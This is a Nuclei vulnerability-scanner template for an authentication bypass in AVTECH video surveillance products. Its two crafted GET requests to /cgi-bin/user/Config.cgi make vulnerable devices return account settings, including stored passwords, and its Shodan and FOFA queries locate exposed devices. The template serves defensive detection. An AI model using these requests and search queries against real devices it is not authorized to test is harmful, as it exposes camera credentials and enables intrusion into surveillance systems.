nuclei-templates/http/vulnerabilities/avtech/avtech-auth-bypass.yaml

40 lines
980 B
YAML

id: avtech-auth-bypass
info:
name: AVTECH Video Surveillance Product - Authentication Bypass
author: ritikchaddha
severity: high
description: |
AVTECH Video Surveillance Products password disclosure through /cgi-bin/user/Config.cgi.
metadata:
max-request: 2
verified: true
shodan-query: title:"login" product:"Avtech"
fofa-query: app="AVTECH-视频监控"
tags: exposure,avtech,auth-bypass,password
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*"
- "{{BaseURL}}/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Account.Maxuser='
- 'Account.LocalPassword='
condition: and
- type: word
part: header
words:
- text/plain
- type: status
status:
- 200